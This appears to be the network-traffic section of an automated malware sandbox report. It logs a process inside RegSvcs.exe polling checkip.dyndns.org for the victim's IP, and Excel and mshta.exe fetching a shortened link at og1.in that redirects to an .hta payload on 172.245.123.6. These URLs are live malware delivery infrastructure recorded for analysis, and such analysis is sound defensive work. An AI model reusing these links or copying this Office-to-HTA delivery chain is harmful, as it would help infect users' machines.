                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 13bf43228afe4c7732f638885046d79f
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:00.600786924 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:00 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 13bf43228afe4c7732f638885046d79f
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.2249187193.122.6.168803176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:12:59.888009071 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:13:00.544815063 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:00 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: fb937dae0fcbdb504e6099992964703d
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:00.574348927 CEST127OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Sep 30, 2024 10:13:00.762027025 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:00 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 9a59ba4ebb24a79384a4e716001db648
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:00.976706028 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:00 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 9a59ba4ebb24a79384a4e716001db648
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:01.568557978 CEST127OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Sep 30, 2024 10:13:01.836648941 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:01 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 2b619f83d9b46b0a38d299fd341a3c3f
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:02.052743912 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:01 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 2b619f83d9b46b0a38d299fd341a3c3f
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.2249191193.122.130.0803176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:13:02.477140903 CEST127OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Sep 30, 2024 10:13:03.319080114 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:03 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: cb17838e8e155477c13e926a915b3065
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:03.528685093 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:03 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: cb17838e8e155477c13e926a915b3065
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.2249193158.101.44.242803176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:13:04.038429022 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:13:05.162117004 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:04 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: aff32af932fe76204abaa83ac6f1ca8a
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:05.162138939 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:04 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: aff32af932fe76204abaa83ac6f1ca8a
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:05.162242889 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:04 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: aff32af932fe76204abaa83ac6f1ca8a
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.2249195132.226.247.73803176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:13:05.826762915 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:13:06.520313978 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:06 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 69f23fabfecb6779c21356fbaa77574b
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:06.728717089 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:06 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 69f23fabfecb6779c21356fbaa77574b
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.2249197158.101.44.242803176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:13:07.255975962 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:13:07.819729090 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:07 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 179ed7c50625ba7e3fce087d99c79066
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:08.028758049 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:07 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 179ed7c50625ba7e3fce087d99c79066
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.2249199132.226.247.73803176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:13:08.513355970 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:13:09.177819967 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:09 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 235dc4ad3b563557b820fe3b20d9c737
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:09.384794950 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:09 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 235dc4ad3b563557b820fe3b20d9c737
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.2249201193.122.130.0803176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:13:10.859591007 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:13:11.298773050 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:11 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 5a1c53990e4b7346de40005197e64140
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:11.508704901 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:11 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 5a1c53990e4b7346de40005197e64140
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.2249163172.67.216.2444433344C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:12:17 UTC319OUTGET /cIP5a8 HTTP/1.1
                                                                                  Accept: */*
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  Host: og1.in
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:12:19 UTC819INHTTP/1.1 302 Found
                                                                                  Date: Mon, 30 Sep 2024 08:12:19 GMT
                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                  Content-Length: 83
                                                                                  Connection: close
                                                                                  location: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta
                                                                                  strict-transport-security: max-age=15552000; includeSubDomains
                                                                                  vary: Accept
                                                                                  x-content-type-options: nosniff
                                                                                  x-dns-prefetch-control: off
                                                                                  x-download-options: noopen
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  x-xss-protection: 0
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IOQL5fI%2BBstzGsZhd4G4zjRtMTBt3CFzQayX%2BAGm6A%2FGus406LhGSo17O0vFMlmsuVS9Y7V8sXWSEKen6Pf9baC6JK8nbErsg4Lgf9BaszNbs52SX0lkwTI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2bf44384a425b-EWR
                                                                                  2024-09-30 08:12:19 UTC83INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 32 33 2e 36 2f 78 61 6d 70 70 2f 63 72 69 6f 2f 49 45 6e 65 74 62 6f 6b 6b 77 6f 72 6b 69 6e 67 66 6f 72 75 70 64 61 74 65 2e 68 74 61
                                                                                  Data Ascii: Found. Redirecting to http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.2249165172.67.216.2444433624C:\Windows\System32\mshta.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:12:21 UTC343OUTGET /cIP5a8 HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  Host: og1.in
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:12:22 UTC819INHTTP/1.1 302 Found
                                                                                  Date: Mon, 30 Sep 2024 08:12:22 GMT
                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                  Content-Length: 83
                                                                                  Connection: close
                                                                                  location: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta
                                                                                  strict-transport-security: max-age=15552000; includeSubDomains
                                                                                  vary: Accept
                                                                                  x-content-type-options: nosniff
                                                                                  x-dns-prefetch-control: off
                                                                                  x-download-options: noopen
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  x-xss-protection: 0
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aTR0MGzAyCjA9EHpW2ccC4CVos5SUf3t896JxFV5t%2FoWHeDQfu%2FK8lVz75jpVwpq7hT9PsCXjjAWb5%2BJTtua6hcAofkmcV8IENWgYTTWuA8OCOZVz3yzueA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2bf5a49c719cf-EWR
                                                                                  2024-09-30 08:12:22 UTC83INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 32 33 2e 36 2f 78 61 6d 70 70 2f 63 72 69 6f 2f 49 45 6e 65 74 62 6f 6b 6b 77 6f 72 6b 69 6e 67 66 6f 72 75 70 64 61 74 65 2e 68 74 61
                                                                                  Data Ascii: Found. Redirecting to http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.2249168172.67.216.2444433344C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:12:40 UTC319OUTGET /cIP5a8 HTTP/1.1
                                                                                  Accept: */*
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  Host: og1.in
                                                                                  Connection: Keep-Alive
